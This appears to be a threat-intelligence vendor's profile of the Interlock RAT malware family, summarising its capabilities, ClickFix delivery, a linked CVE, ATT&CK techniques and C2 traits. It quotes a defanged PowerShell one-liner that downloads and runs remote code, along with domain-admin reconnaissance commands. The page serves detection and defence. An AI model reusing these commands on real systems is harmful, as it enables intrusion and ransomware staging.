Interlock RAT is a modular remote-access trojan associated with the Interlock ransomware ecosystem and observed since 2024. Implementations in Node.js, PHP, PowerShell, C/C++, Java, and JavaScript support Windows and Linux operations. The malware provides remote command execution, system and Active Directory reconnaissance, host fingerprinting, SOCKS proxying, reverse-shell capability, additional-payload delivery, and persistence. Observed Node.js variants collect host, account, privilege, domain, network, service, and process information; enumerate domain relationships and administrative groups; and search Active Directory computer descriptions for backup infrastructure, consistent with ransomware estate assessment. Variants have used user-level autorun persistence and scheduled tasks, while PHP variants have also been reported to support RDP-enabled lateral movement. Interlock RAT has been delivered through phishing, compromised websites, fake browser-update lures, and ClickFix/FileFix social engineering, including campaigns associated with the KongTuke traffic-distribution system. In observed ClickFix activity, victims were induced to execute obfuscated PowerShell that installed a legitimate runtime to run the RAT. Interlock RAT is associated with unauthorized remote access, reconnaissance, data exfiltration, and follow-on ransomware operations; activity has also been linked to the financially motivated cluster tracked as Hive0163. Specific operator identity cannot be established solely from malware-family attribution.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Amazon reported that the Interlock ransomware group has been exploiting the maximum severity vulnerability, CVE-2026-20131 (CVSS: 10), in Cisco Secure Firewall Management Center (FMC) software, since January 2026. Disclosed on March 4th, CVE-2026-20131 is a Remote Code Execution vulnerability impacting Cisco Secure Firewall Management Center (FMC) software.
3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The payload is the Node.js variant of Interlock RAT. It fingerprinted the host, opened a raw TCP session to one of three hardcoded IPs on port 443 behind a four-byte magic header, carried its own SOCKS implementation, and ran a recon burst that ended on an LDAP query hunting for backup servers by description.
The framework has multiple implementations in PowerShell, PHP, C/C++, Java, and JavaScript to support both Windows and Linux. Like NodeSnake, it also communicates with a remote server to fetch commands that allow it to launch a SOCKS5 proxy tunnel, spawn a reverse shell on the infected machine, and deliver more payloads, such as Interlock ransomware and Slopoly.
...used a technique called FileFix to spread a PHP variant of Interlock RAT...
26 distinct techniques documented for this family, organized by ATT&CK tactic.
cmd.exe /d /s /c "wmic process where processid=20716 get commandline"
Persistence | T1053.005 - Scheduled Task/Job:Scheduled Task On Day 3, the threat actor, using the compromised domain administrator account, executed the following command line instruction on a print server to create a scheduled task which executed persistence malware debug.log via node.exe
Like NodeSnake, it also communicates with a remote server to fetch commands that allow it to launch a SOCKS5 proxy tunnel, spawn a reverse shell on the infected machine, and deliver more payloads.
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w H -c "$s='irm dnsgo-windowsds[.]live/nlOs24YoL';iex ([string]::Join('|', $s, 'iex'))"
The malicious component on disk is a text file, debug.txt, which Node runs regardless of extension.
Compromised sites serve a filtered "Verify you are human" page that walks the visitor into pasting a command into the Run dialog.
Persistence | T1053.005 - Scheduled Task/Job:Scheduled Task On Day 3, the threat actor, using the compromised domain administrator account, executed the following command line instruction on a print server to create a scheduled task which executed persistence malware debug.log via node.exe
Persistence | T1053.005 - Scheduled Task/Job:Scheduled Task On Day 3, the threat actor, using the compromised domain administrator account, executed the following command line instruction on a print server to create a scheduled task which executed persistence malware debug.log via node.exe
$s holds only the irm half and [string]::Join('|', $s, 'iex') assembles irm dnsgo-windowsds[.]live/nlOs24YoL|iex at runtime for the outer iex to run.
A DirectorySearcher retrieves every computer object from Active Directory and examines each description for VB, VEEA, BCK, and BACK.
"C:\WINDOWS\system32\whoami.exe" / groups ... "C:\WINDOWS\system32\net.exe" group "domain admins" / domain
C2 Servers (payload delivery)... port 3456 is consistent across the fleet... Additional C2s... TLSv1.0 encrypted C2... TCP backdoor.
The channel is a SOCKS proxy, so the operator can reach anything the workstation can.
62 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
Other indicator types observed in public reporting.
13 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A Node.js-based remote-access trojan associated with the Interlock ransomware operation. It collects host and privilege information, communicates over raw TCP/443 using the 0xdf691155 magic header without TLS, provides SOCKS proxy capability, enumerates Active Directory and local/domain information, searches AD computer descriptions for likely backup servers, and persists through the HKCU Run value ChromeUpdater. It uses a legitimate Node.js executable to run a malicious .txt or .log payload from a user profile.
Associated Analytic Story Azorult Crypto Stealer Forest Blizzard IcedID Interlock Rat Quasar RAT
Cross-platform remote access trojan/framework that communicates with a remote server to fetch commands, launch a SOCKS5 proxy tunnel, spawn a reverse shell, and deliver additional payloads including Interlock ransomware and Slopoly.
A RAT variant delivered as a final payload in KongTuke campaigns and linked in reporting to Interlock activity.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.